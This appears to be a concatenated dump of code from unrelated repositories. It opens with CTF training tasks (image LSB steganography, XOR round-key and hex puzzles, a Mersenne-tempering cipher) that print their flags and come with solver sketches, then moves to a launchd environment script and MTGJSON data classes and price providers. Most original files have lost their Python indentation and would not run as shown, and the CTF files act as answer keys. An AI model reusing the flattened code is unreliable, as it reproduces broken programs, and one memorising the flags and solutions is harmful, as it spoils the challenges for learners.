res += f"{bin(b)[2:]:>08s}"
return res
def lsb_hide(img, data):
pixels = img.load()
mask = ~0x01
k = 0
for i in range(img.height):
for j in range(img.width):
r, g, b = pixels[i, j]
g = (g & mask) | (int(data[k % len(data)]) & 0x01)
pixels[i, j] = (r, g, b)
k += 1
return pixels
archive = open("flag.zip", "rb").read()
image = Image.open("forensic4.png")
lsb_hide(image, toBin(archive))
image.save("forensic4_hid.png")
```
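The matching extractor walks the pixels in the same order, collects the least significant bit of the green channel and regroups the bits MSB-first; a possible sketch (file names assumed to match the script above):
```python
# Sketch of an extractor mirroring lsb_hide above (same pixel traversal,
# green-channel LSB, bits regrouped MSB-first per byte).
from PIL import Image

img = Image.open("forensic4_hid.png")
pixels = img.load()

bits = []
for i in range(img.height):
    for j in range(img.width):
        _, g, _ = pixels[i, j]
        bits.append(g & 0x01)

data = bytearray()
for k in range(0, len(bits) - len(bits) % 8, 8):
    byte = 0
    for bit in bits[k:k + 8]:
        byte = (byte << 1) | bit
    data.append(byte)

# lsb_hide wraps the payload, so the archive starts at offset 0 and the
# trailing bytes are repeated payload.
open("flag_recovered.zip", "wb").write(bytes(data))
```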
#### File: Training_9/add_round_key/main.py
```python
import random
from lib.types import IStdin, IStdout
def main(stdin: IStdin, stdout: IStdout):
stdout.write("To get the flag you need to add 100 4x4 round key matrices to the 4x4 state matrix\n")
stdout.write("Send answers as a 1x16 vectors\n")
stdout.write("Initial state:\n")
initial_state = [random.randint(1, 50) for _ in range(16)]
for i in range(0, 16, 4):
stdout.write(f"{initial_state[i]} {initial_state[i + 1]} {initial_state[i + 2]} {initial_state[i + 3]}\n")
for k in range(100):
stdout.write(f"Round key {k + 1}:\n")
round_key = [random.randint(51, 99) for _ in range(16)]
for i in range(0, 16, 4):
stdout.write(f"{round_key[i]} {round_key[i + 1]} {round_key[i + 2]} {round_key[i + 3]}\n")
initial_state = [initial_state[i] ^ round_key[i] for i in range(16)]
try:
stdout.write("Your array >> ")
stdout.flush()
answer = stdin.readline().strip()
array = [int(i) for i in answer.split(" ")]
if array == initial_state:
stdout.write("Right\n")
else:
stdout.write("Wrooong. That's another array\n")
return
except Exception as exception:
print(exception)
stdout.write("Wrooong. That doesn't look like numbers -_-\n")
return
stdout.write("Well done! Here's your flag:" + open("src/ctf_tasks/add_round_key/flag.txt", 'r').read())
stdout.flush()
```
#### File: Training_9/array_to_hex/array_to_hex.py
```python
from lib.types import IStdin, IStdout
import random
def main(stdin: IStdin, stdout: IStdout):
stdout.write("In this task you will need to convert given array into a single hex string 100 times\n")
for i in range(100):
a = [random.randint(0, 255) for _ in range(random.randint(10, 100))]
stdout.write(f"Array {i + 1}: {' '.join(map(str, a))}\n")
stdout.write("Answer >> ")
stdout.flush()
answer = stdin.readline().strip()
if answer != "".join([hex(j)[2:] for j in a]):
stdout.write("Wrong!\n")
return
stdout.write("Flag: donnuCTF{just_h3xlify}\n")
```
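Note that the expected answer concatenates hex(j)[2:] without zero-padding, so values below 16 contribute a single character; a solver has to mirror that exactly:
```python
# The expected answer is not zero-padded -- mirror hex(j)[2:] exactly.
a = [5, 167, 10]
print("".join(hex(j)[2:] for j in a))   # -> 5a7a
```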
#### File: Training_9/filter_the_array/filter_the_array_easy.py
```python
from lib.types import IStdin, IStdout
import random
def apply_filters(a):
res = []
for i in range(len(a)):
if a[i] == 0:
res.append(a[i])
if not a[i] % 5:
continue
if a[i] % 2 and i % 2:
continue
if not (a[i] % 2) and not (i % 2):
continue
res.append(a[i])
return res
def main(stdin: IStdin, stdout: IStdout):
stdout.write("For given array apply the following filters:\n")
stdout.write(" - never delete 0\n")
stdout.write(" - delete number if it is multiple by 5\n")
stdout.write(" - delete number if it is even and is on even position\n")
stdout.write(" - delete number if it is odd and is on odd position\n")
a = [random.randint(0, 1000) for _ in range(random.randint(10, 100))]
a.append(0)
random.shuffle(a)
stdout.write(f"Array: {' '.join(map(str, a))}\n")
stdout.write("Answer >> ")
stdout.flush()
filtered = apply_filters(a)
try:
answer = list(map(int, stdin.readline().strip().split(" ")))
if filtered != answer:
stdout.write(f"Wroong! It was: {filtered}\n")
return
except Exception:
stdout.write("Wrong input.\n")
return
stdout.write("Good job! Flag: donnuCTF{jus7_r3m0v3_som37thing}\n")
```
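A worked example of the filter semantics above (assuming apply_filters is in scope):
```python
# Worked example of apply_filters above:
print(apply_filters([0, 10, 3, 8]))
# index 0, value 0  -> kept    (zeros are always kept)
# index 1, value 10 -> dropped (multiple of 5)
# index 2, value 3  -> kept    (odd value, but at an even index)
# index 3, value 8  -> kept    (even value, but at an odd index)
# -> [0, 3, 8]
```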
#### File: Training_2/Mersenne dancing the twist/task.py
```python
def encrypt(y):
y = y ^ y >> 11
y = y ^ y << 7 & 2636928640
y = y ^ y << 15 & 4022730752
y = y ^ y >> 18
return y
flag = open("flag", 'rb').read().strip()
encrypted = list(map(encrypt, flag))
print(encrypted)
# 151130148, 189142078, 184947887, 184947887, 155324581, 4194515, 16908820, 16908806, 172234346, 138416801, 151130230, 134222386, 155324647, 151130228, 155324645, 134222434, 155324647, 134222384, 151130148, 155324597, 138416883, 151130230, 134222434, 151130230, 151130230, 138416883, 151130148, 155324597, 172234280, 134222434, 168040121, 172234280, 151130150, 172234280, 151130228, 138416881, 138416801, 155324645, 134222384, 151130230, 151130230, 189142060
``` |
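Because encrypt() is applied to each flag byte independently and the MT19937 tempering is a bijection, the output can be inverted with a 256-entry lookup table rather than by undoing the shifts; a possible solver:
```python
# Solver sketch: build a lookup table of encrypt() over all byte values.
def encrypt(y):
    y = y ^ y >> 11
    y = y ^ y << 7 & 2636928640
    y = y ^ y << 15 & 4022730752
    y = y ^ y >> 18
    return y

encrypted = [151130148, 189142078, 184947887]  # ... full list from the output above
table = {encrypt(b): b for b in range(256)}
print(bytes(table[v] for v in encrypted))
```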
{
"source": "0az/dotfiles",
"score": 3
} |
#### File: .config/launchd/setenv.py
```python
from __future__ import print_function
import argparse
import logging
import os
import pprint
import shlex
import string
import subprocess
import sys
from logging import StreamHandler
from logging.handlers import SysLogHandler
ALPHABET = frozenset(string.ascii_letters)
IDENTIFIER_START = ALPHABET | set('_')
IDENTIFIER = IDENTIFIER_START | set(string.digits)
logger = logging.getLogger()
syslog_sock = None
if os.path.exists('/var/run/syslog'):
syslog_sock = '/var/run/syslog'
elif os.path.exists('/dev/log'):
syslog_sock = '/dev/log'
logger.setLevel(logging.DEBUG)
logger.addHandler(StreamHandler(sys.stdout))
if syslog_sock:
logger.addHandler(SysLogHandler(syslog_sock))
def validate_name(name):
if not name:
return False
if not name[0] in IDENTIFIER_START:
return False
if not set(name) <= IDENTIFIER:
return False
return True
def sanitize_name(name):
name = name.strip()
if not validate_name(name):
raise ValueError('Invalid Name')
return name
def process_value(value):
if not value:
return ''
if value.isspace():
logger.warn(
'Value %s consists solely of spaces - is this a bug?' % repr(value)
)
logger.warn(
'Replacing whitespace value %s with empty string' % repr(value)
)
return ''
orig = value
if value[0].isspace():
logger.warn('Stripping leading space in value=%s' % repr(orig))
value = value.lstrip()
if value[-1].isspace():
logger.warn('Stripping trailing space in value=%s' % repr(orig))
value = value.rstrip()
words = shlex.split(value)
if len(words) > 1:
logger.warn(
'Value %s splits to multiple arguments, joining' % repr(orig)
)
else:
value = words[0]
result = os.path.expandvars(value)
result = os.path.expanduser(result)
return result
def post_process(name, value):
folded = name.upper().lower()
if folded == 'PATH':
lst = value.split(':')
value = ':'.join(os.path.expanduser(elem) for elem in lst)
os.environ[name] = value
return name, value
def process_line(line):
if not line.strip() or line.startswith('#'):
return None, None
tup = line.strip().split('=', 1)
if len(tup) < 2:
raise ValueError("Missing '=' in line %s" % repr(line))
name, value = tup
if not validate_name(name):
try:
name = sanitize_name(name)
logger.warning(
'Sanitized invalid line: name=%s, value=%s'
% (repr(name), repr(value))
)
except ValueError:
logger.error(
'Skipping invalid line: name=%s, value=%s'
% (repr(name), repr(value))
)
return None, None
value = process_value(value)
name, value = post_process(name, value)
return name, value
def main():
logger.info('Starting setenv script')
env = {name: val for name, val in os.environ.items() if name in ('HOME',)}
os.environ.clear()
for name, val in env.items():
os.environ[name] = val
s = pprint.pformat(os.environ)
logger.debug(s)
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--dry-run', action='store_true')
args = parser.parse_args()
directory = os.path.dirname(__file__) or '.'
invocation = ['/bin/launchctl', 'setenv']
with open(os.path.join(directory, 'launchd.env')) as f:
for line in f:
name, value = process_line(line)
if not name:
continue
invocation.append(name)
invocation.append(value)
level = logging.INFO if args.dry_run else logging.DEBUG
for name, value in zip(invocation[2::2], invocation[3::2]):
logger.log(level, '%s=%s' % (name, repr(value)))
s = pprint.pformat(os.environ)
logger.debug(s)
if args.dry_run:
return 0
return subprocess.call(invocation)
if __name__ == '__main__':
sys.exit(main())
``` |
{
"source": "0az/mtgjson",
"score": 3
} |
#### File: mtgjson5/classes/mtgjson_game_formats.py
```python
from typing import List
from mtgjson5.utils import to_camel_case
class MtgjsonGameFormatsObject:
"""
MTGJSON Singular Card.GameFormats Object
"""
paper: bool
mtgo: bool
arena: bool
shandalar: bool
dreamcast: bool
def __init__(self) -> None:
"""
Empty initializer
"""
def to_json(self) -> List[str]:
"""
Support json.dump()
:return: JSON serialized object
"""
return [
to_camel_case(key)
for key, value in self.__dict__.items()
if "__" not in key and not callable(value) and value
]
```
#### File: mtgjson5/classes/mtgjson_set.py
```python
from typing import Any, Dict, List, Optional, Set
from ..classes.mtgjson_card import MtgjsonCardObject
from ..classes.mtgjson_translations import MtgjsonTranslationsObject
from ..utils import to_camel_case
class MtgjsonSetObject:
"""
MTGJSON Singular Set Object
"""
base_set_size: int
block: str
booster: Optional[Dict[str, Any]]
cards: List[MtgjsonCardObject]
code: str
code_v3: str
is_foreign_only: bool
is_foil_only: bool
is_non_foil_only: bool
is_online_only: bool
is_partial_preview: bool
keyrune_code: str
mcm_id: Optional[int]
mcm_name: Optional[str]
mtgo_code: str
name: str
parent_code: str
release_date: str
tcgplayer_group_id: Optional[int]
tokens: List[MtgjsonCardObject]
total_set_size: int
translations: MtgjsonTranslationsObject
type: str
extra_tokens: List[Dict[str, Any]]
search_uri: str
__allow_if_falsey = {
"cards",
"tokens",
"is_foil_only",
"is_online_only",
"base_set_size",
"total_set_size",
}
def __init__(self) -> None:
"""
Initializer to ensure arrays are pre-loaded
"""
self.extra_tokens = []
self.cards = []
self.tokens = []
def __str__(self) -> str:
"""
MTGJSON Set as a string for debugging purposes
:return MTGJSON Set as a string
"""
return str(vars(self))
def build_keys_to_skip(self) -> Set[str]:
"""
Build this object's instance of what keys to skip under certain circumstances
:return What keys to skip over
"""
excluded_keys: Set[str] = {
"added_scryfall_tokens",
"search_uri",
"extra_tokens",
}
for key, value in self.__dict__.items():
if not value:
if key not in self.__allow_if_falsey:
excluded_keys.add(key)
return excluded_keys
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
skip_keys = self.build_keys_to_skip()
return {
to_camel_case(key): value
for key, value in self.__dict__.items()
if "__" not in key and not callable(value) and key not in skip_keys
}
```
#### File: mtgjson5/classes/mtgjson_translations.py
```python
from typing import Any, Dict, Optional
class MtgjsonTranslationsObject:
"""
MTGJSON Set.Translations Object
"""
chinese_simplified: Optional[str]
chinese_traditional: Optional[str]
french: Optional[str]
german: Optional[str]
italian: Optional[str]
japanese: Optional[str]
korean: Optional[str]
portuguese_ob_brazil_cb: Optional[str]
russian: Optional[str]
spanish: Optional[str]
def __init__(self, active_dict: Dict[str, str] = None) -> None:
"""
Initializer, for each language, given the contents
"""
if not active_dict:
return
self.chinese_simplified = active_dict.get("Chinese Simplified")
self.chinese_traditional = active_dict.get("Chinese Traditional")
self.french = active_dict.get("French")
self.german = active_dict.get("German")
self.italian = active_dict.get("Italian")
self.japanese = active_dict.get("Japanese")
self.korean = active_dict.get("Korean")
self.portuguese_ob_brazil_cb = active_dict.get("Portuguese (Brazil)")
self.russian = active_dict.get("Russian")
self.spanish = active_dict.get("Spanish")
@staticmethod
def parse_key(key: str) -> str:
"""
Custom parsing of translation keys
:param key: Key to translate
:return: Translated key for JSON
"""
key = key.replace("ob_", "(").replace("_cb", ")")
components = key.split("_")
return " ".join(x.title() for x in components)
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
return {
self.parse_key(key): value
for key, value in self.__dict__.items()
if "__" not in key and not callable(value)
}
```
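parse_key reverses the ob_/_cb encoding used for parenthesised language names, for example:
```python
# Illustration of the key handling above (interactive-style):
MtgjsonTranslationsObject.parse_key("chinese_simplified")
# -> 'Chinese Simplified'
MtgjsonTranslationsObject.parse_key("portuguese_ob_brazil_cb")
# -> 'Portuguese (Brazil)'
```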
#### File: mtgjson5/compiled_classes/mtgjson_card_types.py
```python
import re
import string
from typing import Any, Dict, List, Match, Optional
from ..providers.scryfall import ScryfallProvider
from ..providers.wizards import WizardsProvider
from ..utils import parse_magic_rules_subset, to_camel_case
class MtgjsonCardTypesObject:
"""
MTGJSON CardTypes Object
"""
class MtgjsonCardTypesInnerObject:
"""
MTGJSON CardTypes.CardTypesInner Object
"""
artifact: List[str]
conspiracy: List[str]
creature: List[str]
enchantment: List[str]
instant: List[str]
land: List[str]
phenomenon: List[str]
plane: List[str]
planeswalker: List[str]
scheme: List[str]
sorcery: List[str]
tribal: List[str]
vanguard: List[str]
def __init__(self, magic_rules: str) -> None:
"""
Internal initializer
:param magic_rules: Rules for MTG from Wizards
"""
planar_regex = re.compile(r".*The planar types are (.*)\.")
self.artifact = ScryfallProvider().get_catalog_entry("artifact-types")
self.conspiracy = []
self.creature = ScryfallProvider().get_catalog_entry("creature-types")
self.enchantment = ScryfallProvider().get_catalog_entry("enchantment-types")
self.instant = ScryfallProvider().get_catalog_entry("spell-types")
self.land = ScryfallProvider().get_catalog_entry("land-types")
self.phenomenon = []
self.plane = regex_str_to_list(planar_regex.search(magic_rules))
self.planeswalker = ScryfallProvider().get_catalog_entry(
"planeswalker-types"
)
self.scheme = []
self.sorcery = self.instant
self.tribal = []
self.vanguard = []
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
return {
to_camel_case(key): value
for key, value in self.__dict__.items()
if "__" not in key and not callable(value)
}
types: Dict[str, Dict[str, List[str]]]
def __init__(self) -> None:
"""
Initializer to build up the object
"""
self.types = {}
comp_rules = parse_magic_rules_subset(WizardsProvider().get_magic_rules())
inner_sets = self.MtgjsonCardTypesInnerObject(comp_rules)
super_regex = re.compile(r".*The supertypes are (.*)\.")
super_types = regex_str_to_list(super_regex.search(comp_rules))
for key, value in inner_sets.to_json().items():
self.types[key] = {"subTypes": value, "superTypes": super_types}
def to_json(self) -> Dict[str, Any]:
"""
Support json.dump()
:return: JSON serialized object
"""
return {
to_camel_case(key): value
for key, value in self.types.items()
if "__" not in key and not callable(value)
}
def regex_str_to_list(regex_match: Optional[Match]) -> List[str]:
"""
Take a regex match object and turn a string in
format "a, b, c, ..., and z." into [a,b,c,...,z]
:param regex_match: Regex match object
:return: List of strings
"""
if not regex_match:
return []
# Get only the sentence with the types
card_types = regex_match.group(1).split(". ")[0]
# Split the types by comma
card_types_split: List[str] = card_types.split(", ")
# If the comma split yielded a single element (i.e. only two types joined by "and"), split by " and " instead
if len(card_types_split) == 1:
card_types_split = card_types.split(" and ")
else:
# Replace the last one from "and XYZ" to just "XYZ"
card_types_split[-1] = card_types_split[-1].split(" ", 1)[1]
for index, value in enumerate(card_types_split):
card_types_split[index] = string.capwords(value.split(" (")[0])
return card_types_split
```
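regex_str_to_list turns a rules sentence of the form "The ... types are a, b, ..., and z." into a list of capitalised names; for instance (sentence shortened for illustration, function assumed in scope):
```python
# Illustration of regex_str_to_list above:
import re

match = re.compile(r".*The supertypes are (.*)\.").search(
    "205.4a The supertypes are basic, legendary, ongoing, snow, and world."
)
print(regex_str_to_list(match))
# -> ['Basic', 'Legendary', 'Ongoing', 'Snow', 'World']
```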
#### File: mtgjson/mtgjson5/price_builder.py
```python
import configparser
import datetime
import json
import logging
import lzma
import pathlib
import shutil
from typing import Any, Dict
import dateutil.relativedelta
import git
import requests
from .consts import CACHE_PATH, OUTPUT_PATH
from .providers import (
CardHoarderProvider,
CardKingdomProvider,
CardMarketProvider,
TCGPlayerProvider,
)
from .utils import deep_merge_dictionaries
LOGGER = logging.getLogger(__name__)
def download_prices_archive(
gist_repo_name: str, file_name: str, github_repo_local_path: pathlib.Path
) -> Dict[str, Dict[str, float]]:
"""
Grab the contents from a gist file
:param gist_repo_name: Gist repo name
:param file_name: File to open from Gist
:param github_repo_local_path: Where to checkout the repo to
:return: File content
"""
github_url = f"https://gist.github.com/{gist_repo_name}"
if github_repo_local_path.is_dir():
LOGGER.info("Deleting Old Price Data Repo")
shutil.rmtree(github_repo_local_path)
LOGGER.info("Cloning Price Data Repo")
git_sh = git.cmd.Git()
git_sh.clone(github_url, github_repo_local_path, depth=1)
with lzma.open(github_repo_local_path.joinpath(file_name)) as file:
return dict(json.load(file))
def upload_prices_archive(
config: configparser.ConfigParser,
github_repo_local_path: pathlib.Path,
content: Any,
) -> None:
"""
Upload prices archive back to GitHub
:param config Config for GitHub
:param github_repo_local_path: Local file system file
:param content: File content
"""
if "GitHub" not in config.sections():
LOGGER.warning("GitHub section not established. Skipping upload")
return
# Config values for GitHub
github_username = config.get("GitHub", "username")
github_api_token = config.get("GitHub", "api_key")
github_file_name = config.get("GitHub", "file_name")
github_repo_name = config.get("GitHub", "repo_name")
if not (
github_username and github_api_token and github_file_name and github_repo_name
):
LOGGER.warning("GitHub key values missing. Skipping upload")
return
# Compress the file to upload for speed and storage savings
with lzma.open(github_repo_local_path.joinpath(github_file_name), "w") as file:
file.write(json.dumps(content).encode("utf-8"))
try:
repo = git.Repo(github_repo_local_path)
# Update remote to allow pushing
repo.git.remote(
"set-url",
"origin",
f"https://{github_username}:{github_api_token}@gist.github.com/{github_repo_name}.git",
)
repo.git.commit("-am", "auto-push")
origin = repo.remote()
origin.push()
LOGGER.info("Pushed changes to GitHub repo")
except git.GitCommandError:
LOGGER.warning("No changes found to GitHub repo, skipping")
shutil.rmtree(github_repo_local_path)
def prune_prices_archive(content: Dict[str, Any], months: int = 3) -> None:
"""
Prune entries from the MTGJSON database that are older than `months` old
:param content: Dataset to modify
:param months: How many months back should we keep (default = 3)
"""
prune_date_str = (
datetime.date.today() + dateutil.relativedelta.relativedelta(months=-months)
).strftime("%Y-%m-%d")
keys_pruned = 0
def prune_recursive(obj: Dict[str, Any], depth: int = 0) -> None:
"""
Recursive pruner to pluck out bad dates and empty fields
"""
nonlocal keys_pruned
if depth == 5:
for date in list(obj.keys()):
if date < prune_date_str:
del obj[date]
keys_pruned += 1
elif isinstance(obj, dict):
for key, value in list(obj.items()):
prune_recursive(value, depth + 1)
if not value:
del obj[key]
keys_pruned += 1
LOGGER.info("Determining keys to prune")
prune_recursive(content)
LOGGER.info(f"Pruned {keys_pruned} structs")
def build_today_prices() -> Dict[str, Any]:
"""
Get today's prices from upstream sources and combine them together
:return: Today's prices (to be merged into archive)
"""
if not OUTPUT_PATH.joinpath("AllPrintings.json").is_file():
LOGGER.error(f"Unable to build prices. AllPrintings not found in {OUTPUT_PATH}")
return {}
card_hoarder = _generate_prices(CardHoarderProvider())
tcgplayer = _generate_prices(TCGPlayerProvider())
card_market = _generate_prices(CardMarketProvider())
card_kingdom = _generate_prices(CardKingdomProvider())
final_results = deep_merge_dictionaries(
card_hoarder, tcgplayer, card_market, card_kingdom
)
return final_results
def _generate_prices(provider: Any) -> Dict[str, Any]:
"""
Generate the prices for a source and prepare them for
merging with other entities
:param provider: MTGJSON Provider that implements generate_today_price_dict
:return Manageable data for MTGJSON prices
"""
preprocess_prices = provider.generate_today_price_dict(
OUTPUT_PATH.joinpath("AllPrintings.json")
)
final_prices: Dict[str, Any] = json.loads(
json.dumps(preprocess_prices, default=lambda o: o.to_json())
)
return final_prices
def get_price_archive_data() -> Dict[str, Dict[str, float]]:
"""
Download compiled MTGJSON price data
:return: MTGJSON price data
"""
config = TCGPlayerProvider().get_configs()
if "GitHub" not in config.sections():
LOGGER.warning("GitHub section not established. Skipping requests")
return {}
# Config values for GitHub
github_repo_name = config.get("GitHub", "repo_name")
github_file_name = config.get("GitHub", "file_name")
github_local_path = CACHE_PATH.joinpath("GitHub-PricesArchive")
if not (github_repo_name and github_file_name and github_local_path):
LOGGER.warning("GitHub key values missing. Skipping requests")
return {}
# Get the current working database
LOGGER.info("Downloading Price Data Repo")
return download_prices_archive(
github_repo_name, github_file_name, github_local_path
)
def download_old_all_printings() -> None:
"""
Download the hosted version of AllPrintings from MTGJSON
for future consumption
"""
file_bytes = b""
file_data = requests.get(
"https://mtgjson.com/api/v5/AllPrintings.json.xz", stream=True
)
for chunk in file_data.iter_content(chunk_size=1024 * 36):
if chunk:
file_bytes += chunk
OUTPUT_PATH.mkdir(parents=True, exist_ok=True)
with OUTPUT_PATH.joinpath("AllPrintings.json").open("w", encoding="utf8") as f:
f.write(lzma.decompress(file_bytes).decode())
def build_prices() -> Dict[str, Any]:
"""
The full build prices operation
Prune & Update remote database
:return Latest prices
"""
LOGGER.info("Prices Build - Building Prices")
# We'll need AllPrintings.json to handle this
if not OUTPUT_PATH.joinpath("AllPrintings.json").is_file():
LOGGER.info("AllPrintings not found, attempting to download")
download_old_all_printings()
# Get today's price database
LOGGER.info("Building new price data")
today_prices = build_today_prices()
if not today_prices:
LOGGER.warning("Pricing information failed to generate")
return {}
archive_prices = get_price_archive_data()
# Update local copy of database
LOGGER.info("Merging price data")
archive_prices = deep_merge_dictionaries(archive_prices, today_prices)
# Prune local copy of database
LOGGER.info("Pruning price data")
prune_prices_archive(archive_prices)
# Push changes to remote database
LOGGER.info("Uploading price data")
config = TCGPlayerProvider().get_configs()
github_local_path = CACHE_PATH.joinpath("GitHub-PricesArchive")
upload_prices_archive(config, github_local_path, archive_prices)
# Return the latest prices
CACHE_PATH.joinpath("last_price_build_time").touch()
return archive_prices
def should_build_new_prices() -> bool:
"""
Determine if prices were built recently enough that there
is no reason to build them again
:return: Should prices be rebuilt
"""
cache_file = CACHE_PATH.joinpath("last_price_build_time")
if not cache_file.is_file():
return True
stat_time = cache_file.stat().st_mtime
last_price_build_time = datetime.datetime.fromtimestamp(stat_time)
twelve_hours_ago = datetime.datetime.now() - datetime.timedelta(hours=12)
return twelve_hours_ago > last_price_build_time
```
#### File: mtgjson5/providers/abstract.py
```python
import abc
import configparser
import datetime
import logging
from typing import Any, Dict, Union
import requests_cache
from ..consts import CACHE_PATH, CONFIG, USE_CACHE
LOGGER = logging.getLogger(__name__)
class AbstractProvider(abc.ABC):
"""
Abstract class to indicate what other providers should provide
"""
class_id: str
session_header: Dict[str, str]
today_date: str = datetime.datetime.today().strftime("%Y-%m-%d")
def __init__(self, headers: Dict[str, str]):
super().__init__()
self.class_id = ""
self.session_header = headers
self.__install_cache()
# Abstract Methods
@abc.abstractmethod
def _build_http_header(self) -> Dict[str, str]:
"""
Construct the HTTP authorization header
:return: Authorization header
"""
@abc.abstractmethod
def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any:
"""
Download an object from a service using appropriate authentication protocols
:param url: URL to download content from
:param params: Options to give to the GET request
"""
# Class Methods
@classmethod
def get_class_name(cls) -> str:
"""
Get the name of the calling class
:return: Calling class name
"""
return cls.__name__
@classmethod
def get_class_id(cls) -> str:
"""
Grab the class ID for hashing purposes
:return Class ID
"""
return cls.class_id
@staticmethod
def get_configs() -> configparser.ConfigParser:
"""
Parse the config for this specific setup
:return: Parsed config file
"""
return CONFIG
@staticmethod
def log_download(response: Any) -> None:
"""
Log how the URL was acquired
:param response: Response from Server
"""
LOGGER.debug(
f"Downloaded {response.url} (Cache = {response.from_cache if USE_CACHE else False})"
)
# Private Methods
def __install_cache(self) -> None:
"""
Initiate the MTGJSON cache for requests
(Useful for development and re-running often)
"""
if USE_CACHE:
CACHE_PATH.mkdir(exist_ok=True)
requests_cache.install_cache(
str(CACHE_PATH.joinpath(self.get_class_name()))
)
```
#### File: mtgjson5/providers/cardhoarder.py
```python
import logging
import pathlib
from typing import Any, Dict, List, Union
from singleton_decorator import singleton
from ..classes import MtgjsonPricesObject
from ..providers.abstract import AbstractProvider
from ..utils import get_all_cards_and_tokens, retryable_session
LOGGER = logging.getLogger(__name__)
@singleton
class CardHoarderProvider(AbstractProvider):
"""
CardHoarder container
"""
ch_api_url: str = "https://www.cardhoarder.com/affiliates/pricefile/{}"
def __init__(self) -> None:
"""
Initializer
"""
super().__init__(self._build_http_header())
def _build_http_header(self) -> Dict[str, str]:
"""
Construct the Authorization header for CardHoarder
:return: Authorization header
"""
headers: Dict[str, str] = {}
__keys_found: bool
config = self.get_configs()
if "CardHoarder" not in config.sections():
LOGGER.warning("CardHoarder section not established. Skipping upload")
self.__keys_found = False
self.ch_api_url = ""
return headers
if config.get("CardHoarder", "token"):
self.__keys_found = True
self.ch_api_url = self.ch_api_url.format(config.get("CardHoarder", "token"))
else:
LOGGER.info("CardHoarder keys values missing. Skipping pricing")
self.__keys_found = False
self.ch_api_url = ""
return headers
def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any:
"""
Download content from CardHoarder
The response body is returned as decoded text (the price file is tab-separated)
:param url: URL to download from
:param params: Options for URL download
"""
session = retryable_session()
session.headers.update(self.session_header)
response = session.get(url)
self.log_download(response)
return response.content.decode()
def convert_cardhoarder_to_mtgjson(
self, url_to_parse: str, mtgo_to_mtgjson_map: Dict[str, str]
) -> Dict[str, float]:
"""
Download CardHoarder cards and convert them into a more
consumable format for further processing.
:param url_to_parse: URL to download CardHoarder cards from
:param mtgo_to_mtgjson_map: Mapping for translating incoming data
:return: Consumable dictionary
"""
mtgjson_price_map = {}
request_api_response: str = self.download(url_to_parse)
# All Entries from CH, cutting off headers
file_rows: List[str] = request_api_response.splitlines()[2:]
for file_row in file_rows:
card_row = file_row.split("\t")
mtgo_id = card_row[0]
card_uuid = mtgo_to_mtgjson_map.get(mtgo_id)
if not card_uuid:
LOGGER.debug(f"CardHoarder {card_row} unable to be mapped, skipping")
continue
if len(card_row) <= 6:
LOGGER.warning(f"CardHoarder entry {card_row} malformed, skipping")
continue
mtgjson_price_map[card_uuid] = float(card_row[5])
return mtgjson_price_map
def generate_today_price_dict(
self, all_printings_path: Any
) -> Dict[str, MtgjsonPricesObject]:
"""
Generate a single-day price structure for MTGO from CardHoarder
:return MTGJSON prices single day structure
"""
if not self.__keys_found:
return {}
mtgo_to_mtgjson_map = self.get_mtgo_to_mtgjson_map(all_printings_path)
normal_cards = self.convert_cardhoarder_to_mtgjson(
self.ch_api_url, mtgo_to_mtgjson_map
)
foil_cards = self.convert_cardhoarder_to_mtgjson(
self.ch_api_url + "/foil", mtgo_to_mtgjson_map
)
db_contents: Dict[str, MtgjsonPricesObject] = {}
self._construct_for_cards(db_contents, normal_cards, True)
self._construct_for_cards(db_contents, foil_cards)
return db_contents
def _construct_for_cards(
self,
semi_completed_data: Dict[str, MtgjsonPricesObject],
cards: Dict[str, float],
is_mtgo_normal: bool = False,
) -> None:
"""
Construct MTGJSON price output for a single day given a card set
:param semi_completed_data: MTGJSON set to update
:param cards: Cards to iterate
"""
for key, value in cards.items():
if key not in semi_completed_data.keys():
semi_completed_data[key] = MtgjsonPricesObject(
"mtgo", "cardhoarder", self.today_date, "USD"
)
if is_mtgo_normal:
semi_completed_data[key].sell_normal = float(value)
else:
semi_completed_data[key].sell_foil = float(value)
@staticmethod
def get_mtgo_to_mtgjson_map(all_printings_path: pathlib.Path) -> Dict[str, str]:
"""
Construct a mapping from MTGO IDs (Regular & Foil) to MTGJSON UUIDs
:param all_printings_path: AllPrintings to generate mapping from
:return MTGO to MTGJSON mapping
"""
mtgo_to_mtgjson = dict()
for card in get_all_cards_and_tokens(all_printings_path):
identifiers = card["identifiers"]
if "mtgoId" in identifiers:
mtgo_to_mtgjson[identifiers["mtgoId"]] = card["uuid"]
if "mtgoFoilId" in identifiers:
mtgo_to_mtgjson[identifiers["mtgoFoilId"]] = card["uuid"]
return mtgo_to_mtgjson
```
#### File: mtgjson5/providers/mtgban.py
```python
import logging
from typing import Any, Dict, Union
from singleton_decorator import singleton
from ..providers.abstract import AbstractProvider
from ..utils import retryable_session
LOGGER = logging.getLogger(__name__)
@singleton
class MTGBanProvider(AbstractProvider):
"""
MTGBan container
"""
api_url: str = "https://www.mtgban.com/api/mtgjson/ck.json?sig={}"
__mtgjson_to_card_kingdom: Dict[str, Dict[str, Dict[str, str]]]
def __init__(self) -> None:
"""
Initializer
"""
super().__init__(self._build_http_header())
self.__mtgjson_to_card_kingdom = {}
def _build_http_header(self) -> Dict[str, str]:
"""
Construct the Authorization header for MTGBan
:return: Authorization header
"""
headers: Dict[str, str] = {}
__keys_found: bool
config = self.get_configs()
if "MTGBan" not in config.sections():
LOGGER.warning("MTGBan section not established. Skipping alerts")
self.__keys_found = False
self.api_url = ""
return headers
if config.get("MTGBan", "api_key"):
self.__keys_found = True
self.api_url = self.api_url.format(config.get("MTGBan", "api_key"))
else:
LOGGER.info("MTGBan keys values missing. Skipping imports")
self.__keys_found = False
self.api_url = ""
return headers
def download(self, url: str, params: Dict[str, Union[str, int]] = None) -> Any:
"""
Download a URL
:param url: URL to download from
:param params: Options for URL download
"""
session = retryable_session()
session.headers.update(self.session_header)
response = session.get(url)
self.log_download(response)
return response.json()
def get_mtgjson_to_card_kingdom(self) -> Dict[str, Dict[str, Dict[str, str]]]:
"""
Get MTGJSON to Card Kingdom translation table
:return Compiled table for future use
"""
if not self.__keys_found:
return {}
if not self.__mtgjson_to_card_kingdom:
self.__mtgjson_to_card_kingdom = self.download(self.api_url)
